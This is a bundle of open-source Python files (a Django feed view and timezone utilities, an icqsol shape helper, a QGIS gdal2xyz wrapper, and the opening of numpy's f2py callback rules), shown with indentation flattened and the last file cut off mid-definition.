# ======================================================================
# repo: diegoguimaraes/django
# path: django/contrib/syndication/views.py
# license: bsd-3-clause
# ======================================================================
from __future__ import unicode_literals
from calendar import timegm
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.http import HttpResponse, Http404
from django.template import loader, TemplateDoesNotExist, RequestContext
from django.utils import feedgenerator
from django.utils.encoding import force_text, iri_to_uri, smart_text
from django.utils.html import escape
from django.utils.http import http_date
from django.utils import six
from django.utils.timezone import get_default_timezone, is_naive, make_aware
def add_domain(domain, url, secure=False):
protocol = 'https' if secure else 'http'
if url.startswith('//'):
# Support network-path reference (see #16753) - RSS requires a protocol
url = '%s:%s' % (protocol, url)
elif not (url.startswith('http://')
or url.startswith('https://')
or url.startswith('mailto:')):
url = iri_to_uri('%s://%s%s' % (protocol, domain, url))
return url
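# Illustrative sketch (not part of the original module; values are
# hypothetical): how add_domain() resolves the different URL shapes.
#
#     add_domain('example.com', '/feeds/latest/')           # 'http://example.com/feeds/latest/'
#     add_domain('example.com', '/feeds/latest/', True)     # 'https://example.com/feeds/latest/'
#     add_domain('example.com', '//cdn.example.com/f/')     # 'http://cdn.example.com/f/'
#     add_domain('example.com', 'mailto:[email protected]')    # returned unchanged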
class FeedDoesNotExist(ObjectDoesNotExist):
pass
class Feed(object):
feed_type = feedgenerator.DefaultFeed
title_template = None
description_template = None
def __call__(self, request, *args, **kwargs):
try:
obj = self.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
raise Http404('Feed object does not exist.')
feedgen = self.get_feed(obj, request)
response = HttpResponse(content_type=feedgen.mime_type)
if hasattr(self, 'item_pubdate') or hasattr(self, 'item_updateddate'):
# if item_pubdate or item_updateddate is defined for the feed, set the
# header so that ConditionalGetMiddleware is able to send a 304 NOT MODIFIED
response['Last-Modified'] = http_date(
timegm(feedgen.latest_post_date().utctimetuple()))
feedgen.write(response, 'utf-8')
return response
def item_title(self, item):
# Titles should be double escaped by default (see #6533)
return escape(force_text(item))
def item_description(self, item):
return force_text(item)
def item_link(self, item):
try:
return item.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
'Give your %s class a get_absolute_url() method, or define an '
'item_link() method in your Feed class.' % item.__class__.__name__
)
def __get_dynamic_attr(self, attname, obj, default=None):
try:
attr = getattr(self, attname)
except AttributeError:
return default
if callable(attr):
# Check co_argcount rather than try/excepting the function and
# catching the TypeError, because something inside the function
# may raise the TypeError. This technique is more accurate.
try:
code = six.get_function_code(attr)
except AttributeError:
code = six.get_function_code(attr.__call__)
if code.co_argcount == 2: # one argument is 'self'
return attr(obj)
else:
return attr()
return attr
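# Illustrative sketch (assumed subclass, not in the original source): each
# hook resolved through __get_dynamic_attr may be a plain attribute, a
# one-argument callable (co_argcount == 2 counting self, called as attr(obj)),
# or a zero-argument callable (called as attr()).
#
#     class NewsFeed(Feed):
#         title = "Site news"              # plain attribute
#         def link(self, obj):             # called as attr(obj)
#             return obj.get_absolute_url()
#         def description(self):           # called as attr()
#             return "Latest updates"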
def feed_extra_kwargs(self, obj):
"""
Returns an extra keyword arguments dictionary that is used when
initializing the feed generator.
"""
return {}
def item_extra_kwargs(self, item):
"""
Returns an extra keyword arguments dictionary that is used with
the `add_item` call of the feed generator.
"""
return {}
def get_object(self, request, *args, **kwargs):
return None
def get_context_data(self, **kwargs):
"""
Returns a dictionary to use as extra context if either
``self.description_template`` or ``self.title_template`` is used.
Default implementation preserves the old behavior
of using {'obj': item, 'site': current_site} as the context.
"""
return {'obj': kwargs.get('item'), 'site': kwargs.get('site')}
def get_feed(self, obj, request):
"""
Returns a feedgenerator.DefaultFeed object, fully populated, for
this feed. Raises FeedDoesNotExist for invalid parameters.
"""
current_site = get_current_site(request)
link = self.__get_dynamic_attr('link', obj)
link = add_domain(current_site.domain, link, request.is_secure())
feed = self.feed_type(
title=self.__get_dynamic_attr('title', obj),
subtitle=self.__get_dynamic_attr('subtitle', obj),
link=link,
description=self.__get_dynamic_attr('description', obj),
language=settings.LANGUAGE_CODE,
feed_url=add_domain(
current_site.domain,
self.__get_dynamic_attr('feed_url', obj) or request.path,
request.is_secure(),
),
author_name=self.__get_dynamic_attr('author_name', obj),
author_link=self.__get_dynamic_attr('author_link', obj),
author_email=self.__get_dynamic_attr('author_email', obj),
categories=self.__get_dynamic_attr('categories', obj),
feed_copyright=self.__get_dynamic_attr('feed_copyright', obj),
feed_guid=self.__get_dynamic_attr('feed_guid', obj),
ttl=self.__get_dynamic_attr('ttl', obj),
**self.feed_extra_kwargs(obj)
)
title_tmp = None
if self.title_template is not None:
try:
title_tmp = loader.get_template(self.title_template)
except TemplateDoesNotExist:
pass
description_tmp = None
if self.description_template is not None:
try:
description_tmp = loader.get_template(self.description_template)
except TemplateDoesNotExist:
pass
for item in self.__get_dynamic_attr('items', obj):
context = self.get_context_data(item=item, site=current_site,
obj=obj, request=request)
if title_tmp is not None:
title = title_tmp.render(RequestContext(request, context))
else:
title = self.__get_dynamic_attr('item_title', item)
if description_tmp is not None:
description = description_tmp.render(RequestContext(request, context))
else:
description = self.__get_dynamic_attr('item_description', item)
link = add_domain(
current_site.domain,
self.__get_dynamic_attr('item_link', item),
request.is_secure(),
)
enc = None
enc_url = self.__get_dynamic_attr('item_enclosure_url', item)
if enc_url:
enc = feedgenerator.Enclosure(
url=smart_text(enc_url),
length=smart_text(self.__get_dynamic_attr('item_enclosure_length', item)),
mime_type=smart_text(self.__get_dynamic_attr('item_enclosure_mime_type', item))
)
author_name = self.__get_dynamic_attr('item_author_name', item)
if author_name is not None:
author_email = self.__get_dynamic_attr('item_author_email', item)
author_link = self.__get_dynamic_attr('item_author_link', item)
else:
author_email = author_link = None
tz = get_default_timezone()
pubdate = self.__get_dynamic_attr('item_pubdate', item)
if pubdate and is_naive(pubdate):
pubdate = make_aware(pubdate, tz)
updateddate = self.__get_dynamic_attr('item_updateddate', item)
if updateddate and is_naive(updateddate):
updateddate = make_aware(updateddate, tz)
feed.add_item(
title=title,
link=link,
description=description,
unique_id=self.__get_dynamic_attr('item_guid', item, link),
unique_id_is_permalink=self.__get_dynamic_attr(
'item_guid_is_permalink', item),
enclosure=enc,
pubdate=pubdate,
updateddate=updateddate,
author_name=author_name,
author_email=author_email,
author_link=author_link,
categories=self.__get_dynamic_attr('item_categories', item),
item_copyright=self.__get_dynamic_attr('item_copyright', item),
**self.item_extra_kwargs(item)
)
return feed
# ======================================================================
# repo: gregvonkuster/icqsol
# path: shapes/icqShape.py
# license: mit
# ======================================================================
#!/usr/bin/env python
"""
@brief A base class for constructing shapes
@author [email protected]
"""
from __future__ import print_function
from csg.core import CSG
from csg.geom import Vector
import numpy
DEFAULTS = dict(origin=[0.0, 0.0, 0.0],
lengths=[1.0, 1.0, 1.0],
radius=1.0,
angle=90.0,
n_theta=16,
n_phi=8)
def Box(origin, lengths):
"""
Create box
@param origin origin/low end of the box
@param lengths lengths in x, y, and z
"""
center = [origin[i] + 0.5*lengths[i] for i in range(len(origin))]
radius = [0.5*le for le in lengths]
return CSG.cube(center=center, radius=radius)
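# Illustrative sketch (hypothetical values, not in the original source): a
# unit box anchored at the origin becomes a CSG cube centred at
# [0.5, 0.5, 0.5] with half-width 0.5 along each axis.
#
#     cube = Box(origin=[0.0, 0.0, 0.0], lengths=[1.0, 1.0, 1.0])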
def Cone(radius, origin, lengths, n_theta=16):
"""
Create cone
@param radius radius
@param origin location of the focal point
@param lengths lengths of the cone
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cone(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Cylinder(radius, origin, lengths, n_theta=16):
"""
Create cylinder
@param radius radius
@param origin center of low end disk
@param lengths lengths of the cylinder along each axis
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cylinder(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Sphere(radius, origin, n_theta=16, n_phi=8):
"""
Create sphere
@param radius radius
@param origin center of the sphere
@param n_theta number of theta cells
@param n_phi number of azimuthal cells
"""
return CSG.sphere(center=origin,
radius=radius,
slices=n_theta,
stacks=n_phi)
def CompositeShape(shape_tuples=[], expression=''):
"""
@param shape_tuples list of (variable_name, shape) pairs
@param expression expression involving +, -, and * operations.
"""
for i in range(len(shape_tuples)):
varName = shape_tuples[i][0]
cmd = '{0} = shape_tuples[{1}][1]'.format(varName, i)
exec(cmd)
return eval(expression)
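# Illustrative sketch (hypothetical values, not in the original source;
# assumes the CSG objects support the overloaded +, -, and * operators the
# docstring describes): a box with a spherical bite subtracted from it.
#
#     box = Box(origin=[0.0, 0.0, 0.0], lengths=[1.0, 1.0, 1.0])
#     ball = Sphere(radius=0.5, origin=[1.0, 1.0, 1.0])
#     bitten = CompositeShape([('b', box), ('s', ball)], 'b - s')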
# ======================================================================
# repo: siliconsmiley/QGIS
# path: python/plugins/processing/algs/gdal/gdal2xyz.py
# license: gpl-2.0
# ======================================================================
# -*- coding: utf-8 -*-
"""
***************************************************************************
gdal2xyz.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputTable
from processing.tools.system import isWindows
from processing.algs.gdal.GdalUtils import GdalUtils
class gdal2xyz(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
OUTPUT = 'OUTPUT'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('gdal2xyz')
self.group, self.i18n_group = self.trAlgorithm('[GDAL] Conversion')
self.addParameter(ParameterRaster(
self.INPUT, self.tr('Input layer'), False))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 9999, 1))
self.addOutput(OutputTable(self.OUTPUT, self.tr('xyz')))
def getConsoleCommands(self):
arguments = []
arguments.append('-band')
arguments.append(unicode(self.getParameterValue(self.BAND)))
arguments.append('-csv')
arguments.append(self.getParameterValue(self.INPUT))
arguments.append(self.getOutputValue(self.OUTPUT))
commands = []
if isWindows():
commands = ['cmd.exe', '/C ', 'gdal2xyz.bat',
GdalUtils.escapeAndJoin(arguments)]
else:
commands = ['gdal2xyz.py', GdalUtils.escapeAndJoin(arguments)]
return commands
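# Illustrative sketch (hypothetical paths, not in the original source): for
# band 1 of input.tif on a non-Windows host, getConsoleCommands() produces
# the equivalent of running:
#
#     gdal2xyz.py -band 1 -csv /path/to/input.tif /path/to/output.csv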
# ======================================================================
# repo: IKholopov/HackUPC2017
# path: hackupc/env/lib/python3.5/site-packages/django/utils/timezone.py
# license: apache-2.0
# ======================================================================
"""
Timezone-related classes and functions.
This module uses pytz when it's available and falls back to its own
implementations when it isn't.
"""
import sys
import time as _time
from datetime import datetime, timedelta, tzinfo
from threading import local
from django.conf import settings
from django.utils import lru_cache, six
from django.utils.decorators import ContextDecorator
try:
import pytz
except ImportError:
pytz = None
__all__ = [
'utc', 'get_fixed_timezone',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class FixedOffset(tzinfo):
"""
Fixed offset in minutes east from UTC. Taken from Python's docs.
Kept as close as possible to the reference version. __init__ was changed
to make its arguments optional, according to Python's requirement that
tzinfo subclasses can be instantiated without arguments.
"""
def __init__(self, offset=None, name=None):
if offset is not None:
self.__offset = timedelta(minutes=offset)
if name is not None:
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time. Taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept as close as possible to the reference version. __init__ was added to
delay the computation of STDOFFSET, DSTOFFSET and DSTDIFF which is
performed at import time in the example.
Subclasses contain further improvements.
"""
def __init__(self):
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
if not hasattr(exc, '__traceback__'):
exc.__traceback__ = sys.exc_info()[2]
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
def get_fixed_timezone(offset):
"""
Returns a tzinfo instance with a fixed offset from UTC.
"""
if isinstance(offset, timedelta):
offset = offset.seconds // 60
sign = '-' if offset < 0 else '+'
hhmm = '%02d%02d' % divmod(abs(offset), 60)
name = sign + hhmm
return FixedOffset(offset, name)
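# Illustrative sketch (not in the original source): the generated name
# encodes the signed offset in hours and minutes.
#
#     get_fixed_timezone(330).tzname(None)   # '+0530'
#     get_fixed_timezone(-60).tzname(None)   # '-0100'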
# In order to avoid accessing settings at compile time,
# wrap the logic in a function and cache the result.
@lru_cache.lru_cache()
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
"""
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
return pytz.timezone(settings.TIME_ZONE)
else:
# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
return LocalTimezone()
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
return timezone.tzname(None)
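# Illustrative sketch (not in the original source):
#
#     _get_timezone_name(pytz.timezone('Europe/Paris'))   # 'Europe/Paris' (via .zone)
#     _get_timezone_name(get_fixed_timezone(60))          # '+0100' (via .tzname(None))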
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(ContextDecorator):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If it is a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
def __enter__(self):
self.old_timezone = getattr(_active, 'value', None)
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
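# Illustrative sketch (not in the original source; a zone name requires pytz):
#
#     with override('Europe/Paris'):
#         get_current_timezone_name()   # 'Europe/Paris'
#     # the previously active time zone is restored on exit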
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (
isinstance(value, datetime) and
(settings.USE_TZ if use_tz is None else use_tz) and
not is_naive(value) and
getattr(value, 'convert_to_local_time', True)
)
return localtime(value) if should_convert else value
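# Illustrative sketch (not in the original source; assumes settings.USE_TZ is
# True): aware datetimes are converted for rendering, everything else passes
# through untouched.
#
#     template_localtime(now())          # converted to the current time zone
#     template_localtime('2015-06-01')   # returned unchanged (not a datetime)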
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is None
def make_aware(value, timezone=None, is_dst=None):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if timezone is None:
timezone = get_current_timezone()
if hasattr(timezone, 'localize'):
# This method is available for pytz time zones.
return timezone.localize(value, is_dst=is_dst)
else:
# Check that we won't overwrite the timezone of an aware datetime.
if is_aware(value):
raise ValueError(
"make_aware expects a naive datetime, got %s" % value)
# This may be wrong around DST changes!
return value.replace(tzinfo=timezone)
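# Illustrative sketch (hypothetical values, not in the original source):
#
#     naive = datetime(2015, 6, 1, 12, 0)
#     make_aware(naive, pytz.timezone('Europe/Paris'))   # uses localize(), DST-aware
#     make_aware(naive, FixedOffset(120, '+0200'))       # falls back to replace(tzinfo=...)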
def make_naive(value, timezone=None):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value.replace(tzinfo=None)
# ======================================================================
# repo: ssanderson/numpy
# path: numpy/f2py/cb_rules.py
# license: bsd-3-clause
# ======================================================================
#!/usr/bin/env python
"""
Build call-back mechanism for f2py2e.
Copyright 2000 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/07/20 11:27:58 $
Pearu Peterson
"""
from __future__ import division, absolute_import, print_function
from . import __version__
from .auxfuncs import (
applyrules, debugcapi, dictappend, errmess, getargs, hasnote, isarray,
iscomplex, iscomplexarray, iscomplexfunction, isfunction, isintent_c,
isintent_hide, isintent_in, isintent_inout, isintent_nothide,
isintent_out, isoptional, isrequired, isscalar, isstring,
isstringfunction, issubroutine, l_and, l_not, l_or, outmess, replace,
stripcomma, throw_error
)
from . import cfuncs
f2py_version = __version__.version
################## Rules for callback function ##############
cb_routine_rules = {
'cbtypedefs': 'typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);',
'body': """
#begintitle#
PyObject *#name#_capi = NULL;/*was Py_None*/
PyTupleObject *#name#_args_capi = NULL;
int #name#_nofargs = 0;
jmp_buf #name#_jmpbuf;
/*typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);*/
#static# #rctype# #callbackname# (#optargs##args##strarglens##noargs#) {
\tPyTupleObject *capi_arglist = #name#_args_capi;
\tPyObject *capi_return = NULL;
\tPyObject *capi_tmp = NULL;
\tint capi_j,capi_i = 0;
\tint capi_longjmp_ok = 1;
#decl#
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_clock();
#endif
\tCFUNCSMESS(\"cb:Call-back function #name# (maxnofargs=#maxnofargs#(-#nofoptargs#))\\n\");
\tCFUNCSMESSPY(\"cb:#name#_capi=\",#name#_capi);
\tif (#name#_capi==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\t#name#_capi = PyObject_GetAttrString(#modulename#_module,\"#argname#\");
\t}
\tif (#name#_capi==NULL) {
\t\tPyErr_SetString(#modulename#_error,\"cb: Callback #argname# not defined (as an argument or module #modulename# attribute).\\n\");
\t\tgoto capi_fail;
\t}
\tif (F2PyCapsule_Check(#name#_capi)) {
\t#name#_typedef #name#_cptr;
\t#name#_cptr = F2PyCapsule_AsVoidPtr(#name#_capi);
\t#returncptr#(*#name#_cptr)(#optargs_nm##args_nm##strarglens_nm#);
\t#return#
\t}
\tif (capi_arglist==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\tcapi_tmp = PyObject_GetAttrString(#modulename#_module,\"#argname#_extra_args\");
\t\tif (capi_tmp) {
\t\t\tcapi_arglist = (PyTupleObject *)PySequence_Tuple(capi_tmp);
\t\t\tif (capi_arglist==NULL) {
\t\t\t\tPyErr_SetString(#modulename#_error,\"Failed to convert #modulename#.#argname#_extra_args to tuple.\\n\");
\t\t\t\tgoto capi_fail;
\t\t\t}
\t\t} else {
\t\t\tPyErr_Clear();
\t\t\tcapi_arglist = (PyTupleObject *)Py_BuildValue(\"()\");
\t\t}
\t}
\tif (capi_arglist == NULL) {
\t\tPyErr_SetString(#modulename#_error,\"Callback #argname# argument list is not set.\\n\");
\t\tgoto capi_fail;
\t}
#setdims#
#pyobjfrom#
\tCFUNCSMESSPY(\"cb:capi_arglist=\",capi_arglist);
\tCFUNCSMESS(\"cb:Call-back calling Python function #argname#.\\n\");
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_call_clock();
#endif
\tcapi_return = PyObject_CallObject(#name#_capi,(PyObject *)capi_arglist);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_call_clock();
#endif
\tCFUNCSMESSPY(\"cb:capi_return=\",capi_return);
\tif (capi_return == NULL) {
\t\tfprintf(stderr,\"capi_return is NULL\\n\");
\t\tgoto capi_fail;
\t}
\tif (capi_return == Py_None) {
\t\tPy_DECREF(capi_return);
\t\tcapi_return = Py_BuildValue(\"()\");
\t}
\telse if (!PyTuple_Check(capi_return)) {
\t\tcapi_return = Py_BuildValue(\"(N)\",capi_return);
\t}
\tcapi_j = PyTuple_Size(capi_return);
\tcapi_i = 0;
#frompyobj#
\tCFUNCSMESS(\"cb:#name#:successful\\n\");
\tPy_DECREF(capi_return);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_clock();
#endif
\tgoto capi_return_pt;
capi_fail:
\tfprintf(stderr,\"Call-back #name# failed.\\n\");
\tPy_XDECREF(capi_return);
\tif (capi_longjmp_ok)
\t\tlongjmp(#name#_jmpbuf,-1);
capi_return_pt:
\t;
#return#
}
#endtitle#
""",
'need': ['setjmp.h', 'CFUNCSMESS'],
'maxnofargs': '#maxnofargs#',
'nofoptargs': '#nofoptargs#',
'docstr': """\
\tdef #argname#(#docsignature#): return #docreturn#\\n\\
#docstrsigns#""",
'latexdocstr': """
{{}\\verb@def #argname#(#latexdocsignature#): return #docreturn#@{}}
#routnote#
#latexdocstrsigns#""",
'docstrshort': 'def #argname#(#docsignature#): return #docreturn#'
}
cb_rout_rules = [
{ # Init
'separatorsfor': {'decl': '\n',
'args': ',', 'optargs': '', 'pyobjfrom': '\n', 'freemem': '\n',
'args_td': ',', 'optargs_td': '',
'args_nm': ',', 'optargs_nm': '',
'frompyobj': '\n', 'setdims': '\n',
'docstrsigns': '\\n"\n"',
'latexdocstrsigns': '\n',
'latexdocstrreq': '\n', 'latexdocstropt': '\n',
'latexdocstrout': '\n', 'latexdocstrcbs': '\n',
},
'decl': '/*decl*/', 'pyobjfrom': '/*pyobjfrom*/', 'frompyobj': '/*frompyobj*/',
'args': [], 'optargs': '', 'return': '', 'strarglens': '', 'freemem': '/*freemem*/',
'args_td': [], 'optargs_td': '', 'strarglens_td': '',
'args_nm': [], 'optargs_nm': '', 'strarglens_nm': '',
'noargs': '',
'setdims': '/*setdims*/',
'docstrsigns': '', 'latexdocstrsigns': '',
'docstrreq': '\tRequired arguments:',
'docstropt': '\tOptional arguments:',
'docstrout': '\tReturn objects:',
'docstrcbs': '\tCall-back functions:',
'docreturn': '', 'docsign': '', 'docsignopt': '',
'latexdocstrreq': '\\noindent Required arguments:',
'latexdocstropt': '\\noindent Optional arguments:',
'latexdocstrout': '\\noindent Return objects:',
'latexdocstrcbs': '\\noindent Call-back functions:',
'routnote': {hasnote: '--- #note#', l_not(hasnote): ''},
}, { # Function
'decl': '\t#ctype# return_value;',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n");',
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#.\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'}, 'GETSCALARFROMPYTUPLE'],
'return': '\treturn return_value;',
'_check': l_and(isfunction, l_not(isstringfunction), l_not(iscomplexfunction))
},
{ # String function
'pyobjfrom': {debugcapi: '\tfprintf(stderr,"debug-capi:cb:#name#:%d:\\n",return_value_len);'},
'args': '#ctype# return_value,int return_value_len',
'args_nm': 'return_value,&return_value_len',
'args_td': '#ctype# ,int',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,return_value,return_value_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\".\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSTRFROMPYTUPLE'],
'return': 'return;',
'_check': isstringfunction
},
{ # Complex function
'optargs': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *return_value
#endif
""",
'optargs_nm': """
#ifndef F2PY_CB_RETURNCOMPLEX
return_value
#endif
""",
'optargs_td': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *
#endif
""",
'decl': """
#ifdef F2PY_CB_RETURNCOMPLEX
\t#ctype# return_value;
#endif
""",
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
"""\
\tif (capi_j>capi_i)
#ifdef F2PY_CB_RETURNCOMPLEX
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#else
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#endif
""",
{debugcapi: """
#ifdef F2PY_CB_RETURNCOMPLEX
\tfprintf(stderr,\"#showvalueformat#.\\n\",(return_value).r,(return_value).i);
#else
\tfprintf(stderr,\"#showvalueformat#.\\n\",(*return_value).r,(*return_value).i);
#endif
"""}
],
'return': """
#ifdef F2PY_CB_RETURNCOMPLEX
\treturn return_value;
#else
\treturn;
#endif
""",
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSCALARFROMPYTUPLE', '#ctype#'],
'_check': iscomplexfunction
},
{'docstrout': '\t\t#pydocsignout#',
'latexdocstrout': ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{hasnote: '--- #note#'}],
'docreturn': '#rname#,',
'_check': isfunction},
{'_check': issubroutine, 'return': 'return;'}
]
cb_arg_rules = [
{ # Doc
